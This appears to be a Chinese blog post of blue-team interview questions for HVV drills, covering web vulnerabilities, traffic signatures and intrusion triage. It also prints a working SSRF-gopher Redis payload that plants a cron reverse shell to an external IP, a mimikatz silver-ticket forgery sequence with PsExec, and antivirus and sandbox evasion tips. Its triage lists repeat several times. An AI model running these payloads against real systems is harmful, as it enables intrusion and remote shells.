护网蓝中面试题

来源:芸云虾扯蛋

fastjson不出网利用

fastjson≤1.2.24

条件:BasicDataSource只需要有dbcp或tomcat-dbcp的依赖即可,dbcp即数据库连接池,在java中用于管理数据库连接,还是挺常见的。

安全加固

4. 操作系统加固

1. 配置加固

2. 应用程序加固

3. 软件加固

5. 服务器加固

邮箱定位画像

1:最好的反击方式当然是渗透拿下对方的钓鱼网站,删除收信箱子。并且反钓鱼,

收集对方各种信息指纹等。但是鉴于对方这些域名已经无法访问,那么此方式略过;

2:封掉这些域名。域名注册机构为西部数码,官网西部数码-15年老牌云服务器、虚拟主机、

域名注册服务商!你可以整理一下证据,像西部反映一下。或者去相关网站举报这些网站。

sql注入dnslog外带

利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,

利用MYSQL内置函数load_file()去访问共享文件,访问的域名被记录,此时变为显错注入

,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,

访问时将访问服务器,记录后查看日志。

注:load_file函数在Linux下是无法用来做dnslog攻击的,涉及到Windows中的UNC路径。(linux中不存在UNC路径)

sql注入堆叠

堆叠注入,顾名思义,就是将语句堆叠在一起进行查询

原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句

select * from users;show databases;

就同时执行以上两条命令,所以我们可以增删改查,只要权限够

虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,

又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,

利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,

往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行

,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。

如何防御sql注入

base64编码、url编码、双url编码、宽字节、使用/**/分割sql关键字、替换空格为xx

如何防御sql注入漏洞

1、在代码层面使用过滤函数正则表达式等对传入的参数进行一个过滤、检测、处理,使得传入的恶意数据无法按照预想方式执行

2、预编译sql语句

3、使用waf,安全狗,阿里云盾等waf进行防护

4、经常进行基线检查、漏洞扫描等工作

sql写shell条件/sqlmap写shell

条件:

1、sql写shell可以用到两个函数outfile和dumpfile可用(select into outfile不可写入二进制可执行文件,select into dumpfile 可写入二进制可执行文件)

2、关闭安全模式(需要数据库允许导出文件也就是secure_file_priv参数配置为空或者是目录地址,设置为NULL的时3、候不允许导出文件)

4、需要足够的权限

5、需要知道网站的绝对路径

6、GPC关闭可使用单引号

sqlmap –os-shell:

对于mysql数据库来说,–os-shell的本质就是写入两个php文件,其中tmpugvzq.php可以让我们上传文件到网站下,让我们命令执行,并将输出的内容返回sqlmap端,另一个返回课以让我们执行系统命令的命令行;简单的说就是先传小马再传自己的大马。

序列化反序列化及其流量特征

序列化:对象转换为字符串

反序列化:字符串转换为对象

流量特征:

shiro反序列化:查看cookie中rememberme字段,恶意命令要从这里传入。判断是否有漏洞,查看返回包set cookie:rememberme=deleteme,验证失败返回的标识符。

fastjson反序列化:请求报文中查找json格式的数据,重点看有无rmi或者出网的一些行为

st2-045:请求头中的Content-Type字段

流量分析

拿到流量包后将其导入wireshark中,使用过滤规则对流量包进行分析,常用的过滤规则有:

http contains “关键字”

http.response.code == 200

http.request.method == POST

tcp.prot == 80

ip.addr == “10.1.1.1”

ip.src

ip.dst

天眼基本搜索语法

sip:”10.1.1.1″ AND dip:”10.1.1.2″ AND status:(200) 

#10.1.1.1访问服务器10.1.1.2状态码为200的流量日志

dport:”443″ OR dport:”8080

#访问端口是443或者8080的流量日志

dport:”80″ NOT host:”www.example.com”

#访问端口为80,排除访问www.example.com域名的流量日志

dip:”10.1.1.2″ AND client_os:”windows7″

#服务器ip为10.1.1.2,操作系统为windows7的流量日志

处置方案:

传感器上出现sql注入告警后

1、验证此条sql注入告警是否真的存在sql注入漏洞

2、通过请求数据包判断触发告警的行为是客户自身还是攻击行为

3、若为自身业务问题,则将漏洞点相关整合成报告反馈客户

4若为攻击者行为,需要进一步分析,查看分析平台攻击ip除了sql注入外是否有其他攻击行为,攻击的结果如何

5、将发现时间及攻击行为反馈给护网客户

传感器上出现RCE告警

1、验证此条警告师傅真的成功(若成功直接出报告)

2、若失败,判断攻击者是手工还是工具批量扫描行为

3、进入分析平台进一步分析,查看分析平台攻击ip除了rce是否有其他攻击行为,攻击结果如何

4、将发现时间及攻击行为反馈给护网

 

ssrf利用ridis打内网

方法二:通过【curl命令】和【gopher协议】远程攻击内网redis

gopher协议是比http协议更早出现的协议,现在已经不常用了,但是在SSRF漏洞利用中gopher可以说是万金油,因为可以使用gopher发送各种格式的请求包,这样就可以解决漏洞点不在GET参数的问题了。 

gopher协议可配合linux下的curl命令伪造POST请求包发给内网主机。

此种方法能攻击成功的前提条件是:redis是以root权限运行的。

payload2如下:

curl -v ‘http://xxx.xxx.xx.xx/xx.php?url=

gopher://172.21.0.2:6379/

_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.220.140%2f2333%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a’

redis命令进行了两次url编码,这里是通过gopher协议伪造的请求包用curl命令来发送;

payload采用的是bash反弹,定时程序路径是/var/spool/cron/root

发送请求之前在公网机192.168.220.140开启nc监听端口2333

nc -lvp 2333 (或nc -l 2333)

流量

冰蝎 2.0 强特征是 accept 里面有个 q=.2

冰蝎 3.0 Content-Type: application/octet-stream

冰蝎 4.0 ua头 referer头 accept 默认aes128 秘闻长度16整数倍

蚁剑是 ua 有 answord 蚁剑的加密特征是以 “0x…..=”开头

哥斯拉 pass 字段

菜刀流量存在一些特征字 eval base64

AWVS 扫描器的特征 :主要是看请求包中是否含有 acunetix wvs 字段

Nessus 扫描器的特征:nessus 字段

java漏洞

shiro(Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,

在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、

AES加密、Base64编码操作。服务器端识别身份解密处理cookie的流程则是: 

获取rememberMe cookie ->base64 解码->AES解密(加密密钥硬编码)->反序列化(未作过滤处理)。

但是AES加密的密钥Key被硬编码(密钥初始就被定义好不能动态改变的)在代码里,这就意味着每个人通过源代码都能拿到AES加密的密钥。

因此,攻击者可以构造一个恶意的对象,并且对其序列化、AES加密、base64编码后,作为cookie的rememberMe字段发送。

Shiro将rememberMe进行解密并且反序列化,最终就造成了反序列化的RCE漏洞。只要rememberMe的AES加密密钥泄露,

无论shiro是什么版本都可能会导致该漏洞的产生.硬编码是将数据直接嵌入到程序或其他可执行对象的源代码中。

如果在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,那么就可能存在此漏洞。

————————————————

shrio550和721的区别

主要区别在于Shiro550使用已知默认密码,只要有足够的密码,不需要Remember Cookie的

Shiro721的ase加密的key为系统随机生成,需要利用登录后的rememberMe去爆破正确的key值。

利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,再去构造反序列化攻击。

fastjson(4.fastjson反序列化漏洞原理

使用AutoType功能进行序列号的JSON字符会带有一个@type来标记其字符的原始类型,

在反序列化的时候会读取这个@type,来试图把JSON内容反序列化到对象,

并且会调用这个库的setter或者getter方法,然而,@type的类有可能被恶意构造,

只需要合理构造一个JSON,使用@type指定一个想要的攻击类库就可以实现攻击。

常见的有sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl,

其中有个dataSourceName方法支持传入一个rmi的源,只要解析其中的url就会支持远程调用!

)(@tamp)

weblogic

(Weblogic的WLS Security组件对外提供webservice服务,

其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,

导致可执行任意命令。

1.3漏洞利用

访问 /wls-wsat/CoordinatorPortType,返回如下页面,则可能存在此漏洞。)

log4j(log4j2框架下的lookup查询服务提供了{}字段解析功能,

传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。

这样如果不对lookup的出栈进行限制,就有可能让查询指向任何服务

(可能是攻击者部署好的恶意代码)。

攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,

在lookup的{}里面构造payload,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,

造成了远程代码执行(可反弹shell到指定服务器)。)(流量jnd${log4j:123}i)

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->

第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 access_log 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 history 日志分析操作命令记录->

最后一步:分析 redis、sql server、mysql、oracle 等日志文件

**Windows 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通

过 tasklist 进行进程定位)->

第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->

第六步:运行 taskschd.msc 排查有无可疑的计划任务->

第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的

access.log 日志文件。

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->

第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 access_log 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 history 日志分析操作命令记录->

最后一步:分析 redis、sql server、mysql、oracle 等日志文件

**Windows 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通

过 tasklist 进行进程定位)->

第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->

第六步:运行 taskschd.msc 排查有无可疑的计划任务->

第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的

access.log 日志文件。

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->

第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 access_log 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 history 日志分析操作命令记录->

最后一步:分析 redis、sql server、mysql、oracle 等日志文件

**Windows 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通

过 tasklist 进行进程定位)->

第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->

第六步:运行 taskschd.msc 排查有无可疑的计划任务->

第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的

access.log 日志文件。

**Linux 入侵排查思路**

第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->

第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->

第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->

第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->

第五步:分析中间件、Web 日志,如 access_log 文件->

第六步:调用命令 last/lastb 翻阅登录日志->

第七步:分析/var/log/cron 文件查看历史计划任务,

第八步->分析 history 日志分析操作命令记录->

最后一步:分析 redis、sql server、mysql、oracle 等日志文件

**Windows 入侵排查思路**

第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通

过 tasklist 进行进程定位)->

第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->

第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->

第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->

第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->

第六步:运行 taskschd.msc 排查有无可疑的计划任务->

第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->

第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的

access.log 日志文件。

陆续推出青藤万相·主机自适应安全平台、青藤蜂巢·云原生安全平台、青藤猎鹰·威胁狩猎平台、

青藤雷火·AI-Webshell检测系统、青藤零域

制作白银票据  (上篇黄金票据已经截过图,主要使用用工具还是mimikatz和psexec)

制作白银票据的条件:

1.域名称

2.域的SID值

3.域的服务账户的密码HASH

4.伪造的用户名,可以是任意用户名,一般伪造administrator

5.需要访问的服务

第一步:

管理员权限运行

mimikatzprivilege::debug #提升权限

sekurlsa::logonpasswords #获取service账户hash 和sid(同一个域下得sid一样)

 

第二步:

清空本地票据缓存

kerberos::purge #清理本地票据缓存

kerberos::list #查看本地保存的票据

 

第三步:

伪造白银票据并导入

kerberos::golden /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /target:win08.superman.com /rc4:f6f19db774c63e49e9af61346adff204 /service:cifs /user:administrator /ptt

 

第四步:

访问域控的共享目录

dir \\win08\c$

远程登陆,执行命令

PsExec.exe \\win08 cmd.exe

whoami   #查看权限

黄金票据

1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot]

2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value]

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

weblogic原理

1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883)

2.利用T3协议配合RMP或ND接口反向发送反序列化数据(CVE2017-3248、CVE2018-2628、CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14644、CVE-2020-14645)还有利用IIOP协议的CVE-2020-2551

3.通过 javabean XML方式发送反序列化数据。(CVE2017-3506->CVE-2017-10271->CVE2019-2725->CVE-2019-2729)

weblogic xml反序列化

原理:xml反序列化,这是wls security组件对外提供的webserver页面,通过xmlDecoder功能来解析用户的xml数据导致的任意字符串被当做代码去执行

特征:服务器开放7001端口  传递xml数到wls-wsat  数据包内容有bash或者dnslog字段。

stu2

stu2-045:

Struts2默认使用org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest 类对上传数据进行解析.JakartaMultiPartRequest类在处理Content-Type时如果获得非预期的值的话,将会抛出一个异常,对这个异常的处理会对错误信息进行OGNL表达式解析,从而造成了恶意代码执行

站库分离打法

对站库分离类型站点通常可以有两个渗透入口点。

  1. web 网站

  2. 数据库

渗透思路其实也是比较常规。但是这里如果两个入口点无非两种路径。

  1. 从 web 网站打入进而打站库分离的数据库,内网渗透

  2. 从数据库打入进而打站库分离的 web 网站,内网渗透

Java内存马排查思路

内存马在语言类型上有PHP内存马,Python内存马,而本文主要侧重于“市场占有率”最高的java内存马的检测与查杀,java内存马又主要分为下面这三大类

servlet-api类

filter型

servlet型

listener型

spring类

拦截器

controller型

Java Instrumentation类

agent型

内存马特征的识别

检测工具(arthas,java-memshell-scanner)

ridis主从复制

主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);

数据的复制是单向的,只能由主节点到从节点。

默认情况下,每台Redis服务器都是主节点,且一个主节点可以有多个从节点(或没有从节点),但一个从节点只能有一个主节点。

403绕过

使用插件 X-Forwarded-For Header

使用BurpSuite

使用BurpSuite插件 BurpSuite_403Bypasser【推荐】

修改HOST

覆盖请求URL

Referer标头绕过

代理IP

扩展名绕过

免杀思路

特征码检测

对文件或内存中存在的特征做检测,一般的方法是做模糊哈希或者机器学习跑模型,优点是准确度高,缺点是对未知木马缺乏检测能力。所以目前依赖厂商的更新,厂商做的更新及时能有效提高杀软的防护水平。目前一些杀软对相似的病毒有一定的检测能力,猜测是基于模糊哈希做的。部分杀软同样对于加壳也有检测能力,对于不同的厂家有不同的策略,有些会对文件进行标记,而某数字会直接告警。

关联检测

检测的特征不仅仅是恶意payload的特征,也可能是一组关联的代码,把一组关联信息作为特征。比如在使用加载器加载shellcode时,需要开辟内存,将shellcode加载进内存,最后执行内存区域shellcode。这些步骤就被反病毒人员提取出来作为特征,在调用了一组开辟内存的函数比如virtualAlloc之后对该内存使用virtualProtect来更改标示位为可执行并且对该内存进行调用就会触发报毒。以上只是一个简单的例子,具体情况具体分析,部分厂商对其进行了扩展,所以现在使用另外几个函数进行调用也无法免杀。不过其本质还是黑名单,还存在没有被覆盖到的漏网之鱼。

行为检测

行为检测通过hook关键api,以及对各个高危的文件、组件做监控防止恶意程序对系统修改。只要恶意程序对注册表、启动项、系统文件等做操作就会触发告警。最后,行为检测也被应用到了沙箱做为动态检测,对于避免沙箱检测的办法有如下几个:

  • 延时,部分沙箱存在运行时间限制

  • 沙箱检测,对诸如硬盘容量、内存、虚拟机特征做检测

  • 部分沙箱会对文件重命名,可以检测自身文件名是否被更改

面试过程中把面试官带入自己的节奏中

推荐了解以下领域

数据安全

企业安全建设

免杀思路

逆向

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容